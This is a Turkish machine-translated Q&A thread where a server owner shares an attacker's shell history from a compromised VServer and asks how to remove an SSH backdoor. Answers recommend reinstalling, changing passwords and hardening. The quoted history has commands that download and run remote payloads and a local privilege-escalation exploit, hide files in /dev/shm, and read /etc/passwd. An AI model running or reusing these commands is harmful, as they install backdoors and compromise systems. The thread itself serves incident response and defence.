VServer'da SSH Backdoor bulundu. Ne yapalım?

24

Dün VServer'imdeki komut geçmişimi kontrol ettim. Birkaç şüpheli hat buldum.

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

Özellikle sniffer.tgz beni şok etti. Sanal bir makine kurdum ve bu tgz arşivini indirdim. Kuruluma başladım ve bana şu satırları verdi:

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

Bunu nasıl kaldıracağını bilen var mı?

ssh  security  malware 
itskajo
kaynak
8
Mark

Yanıtlar:

66

Bu, üzerinde çalıştığınız tüm sistemlerde yapmanız gerekenler sniffer.tgz: Nuke Them From Orbit'ten hemen başlayın ve temiz bir kurulumdan başlayın. (Bu, sistemleri yok edin, temiz olanı yeniden yükleyin, temiz yedeklerden veri yükleyin - temiz olan yedekleriniz olduğunu varsayalım ve ardından sistemi yeniden Internet'e koymadan önce sertleştirin).

Eğer kötü amaçlı yazılım varsa veya hackerlar bu gibi sisteminize aldığınızda, 's zaman sistem nasıl yapılandırıldığını tekrar analiz ve emin olmak için değil onlar ile var aynı adımları tekrarlayın. Ancak, bu bir sistem olmayabilir, çünkü kenara ve adli olarak analiz etme yeteneğiniz var ve bu tek sunucunuz olabileceğinden, sadece sanal sistemi yok etme ve sıfırdan başlamanın zamanı geldi (yukarıda söylediğim gibi).

(Bu, sisteme kötü amaçlı yazılım bulabileceğiniz herhangi bir durum için de geçerlidir. Bu tür bir şeyi değiştirmek için yedek donanımınız olmadığı sürece, çoğu kullanıcının sahip olmadığı, ihlal edilen sistemi izole edip adli olarak inceleyebilirsiniz; sistemi yok etmek ve yeniden başlamak için

Sunucunuzu analiz etmeden neyi yanlış yaptığınızı gerçekten söyleyemem, ancak bu arka kapı sistemde kurulu olan basit bir 'programdan' daha derin olabilir. Ve, kötü adamlar sisteminize zaten bir arka kapı kurmaları gerektiğinden, tüm şifrelerinizin artık ihlal edildiğini ve artık güvende olmadığını (SSH veya MySQL kökü veya EVER olan başka bir şifre türü için olduğunu varsayabilirsiniz) bu bilgisayar sistemine girilmiştir). Tüm şifrelerinizi değiştirme zamanı !

Temiz bir ortama geri döndüğünüzde, göz önünde bulundurulması gereken sertleştirme adımları hakkında bazı temel ipuçları. Bunlar bir konuyu daha geniş bir konu haline getirdiği için burada gerçekten ayrıntılara giremiyorum, ancak sisteminizi korumak için bazı sertleştirme adımları atmanın tam zamanı:

  1. Bir güvenlik duvarını açın ve yalnızca açılması gereken bağlantı noktalarına erişime izin verin . ufwbasit olmak için var, öyleyse onu kullanalım. sudo ufw enable. ( ufwOrtamınız için doğru şekilde yapılandırmak farklı bir hikayedir ve bu, bu sorunun sınırlarının ötesine geçer.)

  2. Uzak SSH'ye erişimi kısıtlayın . Bu her zaman mümkün değildir, ancak ideal olarak size ait olan IP adreslerini belirler ve özellikle onları güvenlik duvarında beyaz listeye alırsınız. (Dinamik bir konut IP adresindeyseniz bu adımı atlayın).

  3. Sunucunuza SSH erişimini kilitleyin ve yalnızca kimlik doğrulama için SSH anahtarlarını kullanmanızı gerektirir . Bu şekilde bilgisayar korsanları sunucu saldırı ve denemek ve sadece olamaz tahmin şifreleri. Uygun özel anahtarı tahmin etmek çok daha zordur (çünkü hepsini zorlamak zorunda kalacaksınız) ve bu, kaba kuvvet saldırılarına karşı korunmaya yardımcı olur.

  4. Bir web sitesi kullanıyorsanız, kişilerin istedikleri zaman bir şeyleri yükleyememesi / yürütmemesi için izinleri kilitlediğinizden emin olun . Bunu yapmak siteden siteye değişir, bu yüzden burada size daha fazla rehberlik edemem (bunu yapmak imkansız).

  5. Ayrıca, Joomla veya Wordpress gibi bir web sitesi kullanıyorsanız , ortamın güncel kaldığından ve yazılım sağlayıcıların güvenlik açıklarına yakalandığından emin olun .

  6. Mümkün olduğunda, kimlik doğruladığınız şeyler için iki faktörlü kimlik doğrulama (2FA) yöntemlerini ayarlayın, yapılandırın ve kullanın . Farklı başvurular için ikinci faktör kimlik doğrulaması için birçok çözüm vardır ve çeşitli uygulamaları bu şekilde güvence altına almak bu yazının kapsamı dışındadır, bu nedenle bir çözüm seçmeden önce bu noktada araştırmanızı yapmalısınız.

  7. Eğer varsa mutlaka gerekir Kurulumunuzda şifreler kullanmak, (bulut tabanlı olanlar mutlaka iyi değil seçeneklerdir) iyi bir parola yöneticisi kullanın ve, davranıyor her bir parçaya farklı rasgele, unmemorable şifreleri (25+ karakter) uzun uzunluğunu kullanmak şifreleri ile güvence altına alınmıştır (dolayısıyla şifre yöneticisi için öneri). (Ancak, mümkünse şifreler kullanmamayı (SSH kimlik doğrulaması için olduğu gibi) ve mümkünse 2FA kullanmamayı kesinlikle düşünmelisiniz.

Thomas Ward
kaynak
Yorumlar uzun tartışmalar için değildir; bu konuşma sohbete taşındı .
terdon
Cevabı kabul ettim, çünkü yapacağım şey bu. Asla benim kişisel ilgim için VM'deki Backdoor'u kapatmaya çalışmadım.
itskajo
0

Bir arka kapı varsa 3 tane daha var. İzole edin, verileri yedekleyin, nuke edin ve verileri dikkatlice geri yükleyin. Herhangi bir cron, php ve hatta mysql verisine dikkat edin, hepsi tehlikeye girebilir. Bu noktada, tüm şifrelerinize ve karma değerlerine sahip olduklarını unutmayın, bu nedenle benzer şekilde yapılandırılmış diğer makineler varsa, muhtemelen bunları da hacklerler. Zor kısım, nasıl başlayacaklarına karar vermektir. WordPress eklentileri / temaları vb kötü amaçlı yazılım aramak varsa ... İzinlerinizi kontrol edin, her yerde 777 olabilir. Basit bir cevap yok, çok iş arıyorsun.

tony lester
kaynak
Birden fazladan ille de ille de olmaz, ancak burada olması muhtemel bu olabilir veya sıklıkla olabilir. Ve kesinlikle tüm şifreleri olmayabilir. Başka makinelere de zarar vermeleri "muhtemel" değildir, niyetlerini ve koklamalarını bilmiyorsunuzdur, ya da kötü program var olmanın ötesinde harekete geçirildiyse ya da bir şekilde çalıştırılsa bile. Ve "dikkatlice verileri geri yükle", çok titiz eylemler gerektiren bir şey için çok genel bir öneridir.
James
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.